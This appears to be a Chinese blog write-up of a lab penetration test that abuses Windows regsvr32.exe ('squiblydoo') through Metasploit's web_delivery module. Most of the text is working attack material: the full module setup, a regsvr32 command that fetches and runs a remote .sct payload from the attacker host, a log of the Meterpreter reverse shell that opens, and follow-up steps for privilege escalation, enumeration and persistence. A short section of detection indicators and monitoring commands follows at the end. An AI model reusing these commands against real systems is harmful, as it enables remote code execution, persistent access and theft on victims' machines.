当前位置: 首页 > news >正文

基于Regsvr32.exe的渗透测试完整记录

基于Regsvr32.exe的渗透测试完整记录

测试环境配置

攻击端信息

  • 攻击系统:Kali Linux (Metasploit)
  • 攻击IP:192.168.1.80
  • 监听端口:7777
  • Web服务端口:8080

目标端信息

  • 目标系统:Windows
  • 目标IP:192.168.1.30
  • 连接端口:52982

完整攻击流程

步骤1:Metasploit模块配置

# 选择Web Delivery模块msf>use exploit/multi/script/web_delivery# 查看当前选项msf exploit(multi/script/web_delivery)>options# 查看可用目标类型msf exploit(multi/script/web_delivery)>show targets# 设置目标类型为Regsvr32msf exploit(multi/script/web_delivery)>settarget3# 配置Payloadmsf exploit(multi/script/web_delivery)>setpayload windows/x64/meterpreter/reverse_tcp# 设置监听主机和端口msf exploit(multi/script/web_delivery)>setlhost192.168.1.80 msf exploit(multi/script/web_delivery)>setlport7777# 设置Web服务器主机msf exploit(multi/script/web_delivery)>setsrvhost192.168.1.80# 验证配置msf exploit(multi/script/web_delivery)>show options

步骤2:启动攻击模块

# 后台运行攻击模块msf exploit(multi/script/web_delivery)>exploit -j# 系统返回信息:[*]Exploit running as background job0.[*]Exploit completed, but no session was created.[*]Started reverse TCP handler on192.168.1.80:7777[*]Using URL: http://192.168.1.80:8080/pxmlOB2r[*]Server started.

步骤3:生成攻击命令

Metasploit生成以下攻击命令:

regsvr32 /s /n /u /i:http://192.168.1.80:8080/pxmlOB2r.sct scrobj.dll

命令参数解析

  • /s: 静默模式,不显示消息框
  • /n: 不调用DllRegisterServer
  • /u: 注销服务器
  • /i:http://...: 调用DllInstall并传递恶意.sct文件的URL
  • scrobj.dll: Windows脚本组件处理库

步骤4:执行攻击

在目标Windows系统(192.168.1.30)上执行生成的regsvr32命令。

regsvr32 /s /n /u /i:http://192.168.1.80:8080/pxmlOB2r.sct scrobj.dll

步骤5:攻击成功验证

系统日志显示攻击成功:

[*] 192.168.1.30 web_delivery - Handling .sct Request [*] 192.168.1.30 web_delivery - Delivering Payload (3736 bytes) [*] Sending stage (230982 bytes) to 192.168.1.30 [*] Meterpreter session 1 opened (192.168.1.80:7777 -> 192.168.1.30:52982) at 2026-01-18 07:43:51 -0500

技术分析

1. 攻击原理

  • Web Delivery模块:在攻击机(192.168.1.80)上启动Web服务器(端口8080)
  • 恶意.sct文件:托管在http://192.168.1.80:8080/pxmlOB2r.sct
  • Regsvr32滥用:利用regsvr32.exe的/i参数加载远程脚本组件
  • 载荷投递:通过scrobj.dll执行远程.sct文件中的恶意代码

2. 网络流量分析

攻击路径: 目标机(192.168.1.30) → HTTP请求 → 攻击机(192.168.1.80:8080/pxmlOB2r.sct) 攻击机(192.168.1.80) → 反向TCP → 目标机(192.168.1.30:52982)

3. 载荷信息

  • Payload大小:3736字节(初始) + 230982字节(阶段载荷)
  • 连接方向:反向TCP连接
  • 会话信息:Session ID 1,从192.168.1.30:52982连接到192.168.1.80:7777

后续操作建议

1. 进入Meterpreter会话

# 查看当前会话msf>sessions -l# 进入会话1msf>sessions -i1# 执行基本命令meterpreter>sysinfo meterpreter>getuid meterpreter>getpid

2. 后渗透操作

# 权限提升meterpreter>getsystem# 信息收集meterpreter>run post/windows/gather/enum_logged_on_users meterpreter>run post/windows/gather/enum_applications# 持久化meterpreter>run persistence -U -i10-p7777-r192.168.1.80

防御检测建议

1. 检测指标

  • 进程创建:regsvr32.exe调用scrobj.dll
  • 网络连接:HTTP请求到异常URL的.sct文件
  • 命令行参数:包含/s /n /u /i:http://的regsvr32命令

2. 防御措施

# 监控Regsvr32执行Get-WinEvent-FilterHashtable @{LogName='Security';ID=4688}|Where-Object{$_.Message-like"*regsvr32*"-and$_.Message-like"*/i:*"}# 应用白名单限制New-Item-Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe-Force

3. 网络防护

  • 阻止从内部主机到外部IP的regsvr32相关HTTP请求
  • 监控异常.sct文件下载行为
  • 限制regsvr32.exe执行远程代码的能力

实验总结

本次测试成功演示了利用Regsvr32.exe的"squiblydoo"攻击技术,通过滥用scrobj.dll加载远程恶意.sct文件,建立了反向Meterpreter会话。攻击从启动到建立会话用时极短,显示了此类攻击的高效性和隐蔽性。防御方应重点关注regsvr32异常使用和.sct文件远程加载行为。

http://www.jsqmd.com/news/264023/

相关文章:

  • L2 Intern-S1/InternVL 微调公式识别实践
  • redis启动连接命令
  • 短视频平台如何将16:9照片发成竖版全屏,而不是横板
  • Teanary 多语言多货币外贸商城系统架构与数据流程图
  • 小程序毕设项目:基于springboot+微信小程序的公考宝典小程序(源码+文档,讲解、调试运行,定制等)
  • Java毕设项目:基于springboot的4s店车辆管理系统(源码+文档,讲解、调试运行,定制等)
  • 基于ssm的鲜花售卖系统-计算机毕业设计源码+LW文档
  • Stephen Krashen(史蒂芬·克拉申)
  • 2026年目前诚信的双相钢法兰直销厂家哪家权威,高温合金法兰/不锈钢法兰/法兰/非标法兰,双相钢法兰直销厂家排行 - 品牌推荐师
  • 4种空中飞行物数据集3561张VOC+YOLO(热气球飞艇飞机直升机)
  • 共同探索的价值
  • 空中飞行物检测数据集2895张yolo数据集
  • 计算机小程序毕设实战-基于springboot+微信小程序的公考宝典小程序【完整源码+LW+部署说明+演示视频,全bao一条龙等】
  • 四叶草PDF阅读器(无广告免费PDF阅读器)
  • FreeRTOS学习笔记(9)
  • 【毕业设计】基于springboot的4s店车辆管理系统(源码+文档+远程调试,全bao定制等)
  • 小程序毕设选题推荐:基于SpringBoot+微信小程序高考考试刷题系统基于springboot+微信小程序的公考宝典小程序【附源码、mysql、文档、调试+代码讲解+全bao等】
  • 为什么手机越用越卡?原来是这 3 个地方在拖后腿
  • 一文搞懂AI核心:预训练、微调与LLaMA-Factory Online高效实践
  • 气球数据集1155张VOC+YOLO格式
  • 互联网大厂Java求职面试:从Spring框架到微服务架构的技术点解析
  • 学长亲荐!10款AI论文网站测评:本科生毕业论文必备工具
  • 强烈安利10个AI论文平台,助你轻松搞定本科生论文!
  • 气球数据集1136张VOC+YOLO格式
  • 【毕业设计】基于springboot+微信小程序的公考宝典小程序(源码+文档+远程调试,全bao定制等)
  • 微信小程序毕设项目推荐-基于spirngboot和微信小程序实现公考上岸通系统基于springboot+微信小程序的公考宝典小程序【附源码+文档,调试定制服务】
  • 轻松入门SpringAI-SpringAI调用Ollama
  • 气球数据集2291张VOC+YOLO格式
  • 从Hadoop到Spark:大数据隐私保护技术演进史
  • 2026二手房翻新全攻略:靠谱公司大揭秘 - 品牌测评鉴赏家